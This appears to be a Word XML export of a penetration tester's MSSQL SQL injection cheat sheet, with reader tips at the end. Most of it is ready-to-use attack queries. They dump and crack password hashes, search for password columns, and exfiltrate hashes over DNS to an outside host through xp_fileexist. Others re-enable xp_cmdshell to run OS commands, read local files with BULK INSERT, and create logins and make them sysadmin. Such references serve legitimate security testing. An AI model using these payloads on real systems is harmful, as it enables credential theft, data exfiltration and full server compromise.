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textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>MSSQL Injection Cheat Sheet</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Some useful syntax reminders for SQL Injection into MSSQL databases…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This post is part of a series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.</w:t>
      </w:r>
    </w:p>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r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>I’m not planning to write one for MS Access, but there’s a great </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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>MS Access Cheat Sheet here</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end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>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r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1249" w:tblpY="309"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="104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836"/>
        <w:gridCol w:w="8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Version</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Comments</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1 — comment</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/*comment*/1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Current User</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user_name();</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system_user;</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user;</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loginame FROM master..sysprocesses WHERE spid = @@SPID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Users</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name FROM master..syslogins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Password Hashes</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name, password FROM master..sysxlogins — priv, mssql 2000;</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name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.</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name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;</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name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005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 Password Cracker</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MSSQL 2000 and 2005 Hashes are both SHA1-based.  </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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://labs.portcullis.co.uk/application/phrasen-drescher/" </w:instrTex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separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="7"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>phrasen|drescher</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end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t> can crack these.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Privileges</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 current privs on a particular object in 2005, 2008</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permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database</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permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server</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permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table</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permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);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2" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="baseline"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>–permissions on a user– current privs in 2005, 2008</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is_srvrolemember(‘sysadmin’);</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is_srvrolemember(‘dbcreator’);</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is_srvrolemember(‘bulkadmin’);</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is_srvrolemember(‘diskadmin’);</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is_srvrolemember(‘processadmin’);</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is_srvrolemember(‘serveradmin’);</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is_srvrolemember(‘setupadmin’);</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is_srvrolemember(‘securityadmin’);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2" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="baseline"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>– who has a particular priv? 2005, 2008</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name FROM master..syslogins WHERE denylogin = 0;</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name FROM master..syslogins WHERE hasaccess = 1;</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name FROM master..syslogins WHERE isntname = 0;</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name FROM master..syslogins WHERE isntgroup = 0;</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name FROM master..syslogins WHERE sysadmin = 1;</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name FROM master..syslogins WHERE securityadmin = 1;</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name FROM master..syslogins WHERE serveradmin = 1;</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name FROM master..syslogins WHERE setupadmin = 1;</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name FROM master..syslogins WHERE processadmin = 1;</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name FROM master..syslogins WHERE diskadmin = 1;</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name FROM master..syslogins WHERE dbcreator = 1;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>SELECT name FROM master..syslogins WHERE bulkadmin =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DBA Accounts</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is_srvrolemember(‘sysadmin’); — is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try ‘bulkadmin’, ‘systemadmin’ and other values from the </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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://msdn.microsoft.com/en-us/library/ms176015.aspx" </w:instrTex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separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="7"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>documentation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="7"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>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end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.</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name FROM master..syslogins WHERE sysadmin = ’1′ — tested on 2005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Current Database</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DB_NAME()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Databases</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name FROM master..sysdatabases;</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DB_NAME(N); — for N = 0, 1, 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Columns</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name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only</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master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable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List Tables</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name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views</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name FROM someotherdb..sysobjects WHERE xtype = ‘U’;</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master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable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Find Tables From Column Name</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 NB: This example works only for the current database.  If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).</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sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’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Nth Row</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TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row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Nth Char</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substring(‘abcd’, 3, 1) — returns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Bitwise AND</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6 &amp; 2 — returns 2</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6 &amp; 1 — returns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ASCII Value -&gt; Char</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char(0×41) — returns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Char -&gt; ASCII Value</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ascii(‘A’) – returns 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Casting</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CAST(’1′ as int);</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SELECT CAST(1 as char)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String Concatenation</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‘A’ + ‘B’ – returns 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If Statement</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IF (1=1) SELECT 1 ELSE SELECT 2 — returns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Case Statement</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CASE WHEN 1=1 THEN 1 ELSE 2 END — returns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Avoiding Quotes</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char(65)+char(66) — returns AB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Time Delay</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 WAITFOR DELAY ’0:0:5′ — pause for 5 seconds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Make DNS Requests</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declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\’ + @host + ‘c$boot.ini”’); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\’ + @host + ‘c$boot.ini”’); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.</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 Also check out theDNS tunnel feature of </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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://sqlninja.sourceforge.net/sqlninja-howto.html" </w:instrTex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separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="7"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>sqlninja</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Command Execution</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EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:</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EXEC sp_configure ‘show advanced options’, 1; — priv</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RECONFIGURE; — priv</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EXEC sp_configure ‘xp_cmdshell’, 1; — priv</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RECONFIGURE; — priv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Local File Access</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CREATE TABLE mydata (line varchar(8000));</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BULK INSERT mydata FROM ‘c:boot.ini’;</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DROP TABLE mydata;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Hostname, IP Address</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SELECT HOST_NAME()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Create Users</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EXEC </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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://msdn2.microsoft.com/en-us/library/ms173768.aspx" </w:instrTex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separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="7"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>sp_addlogin</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end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t> ‘user’, ‘pass’; — priv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Drop Users</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EXEC </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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://msdn2.microsoft.com/en-us/library/ms189767.aspx" </w:instrTex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separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="7"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>sp_droplogin</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end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t> ‘user’; — priv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Make User DBA</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EXEC </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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://msdn2.microsoft.com/en-us/library/ms186320.aspx" </w:instrTex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separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="7"/>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>master.dbo.sp_addsrvrolemember</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="0099BB"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t> ‘user’, ‘sysadmin; — priv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Location of DB files</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EXEC sp_helpdb master; –location of master.mdf</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EXEC sp_helpdb pubs; –location of pubs.mdf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836"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Default/System Databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8648"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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>northwind</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model</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msdb</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pubs — not on sql server 2005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>tempdb</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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Misc Tips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In no particular order, here are some suggestions from pentestmonkey readers.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Style w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>From Dan Crowley:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.notsosecure.com/folder2/2010/06/29/mysql-exploitation-with-error-messages" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0099BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>A way to extract data via SQLi with a MySQL backend</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Style w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>From Jeremy Bae:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Tip about sp_helpdb – included in table above.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Style w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>From Trip:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>List DBAs (included in table above now):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2" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
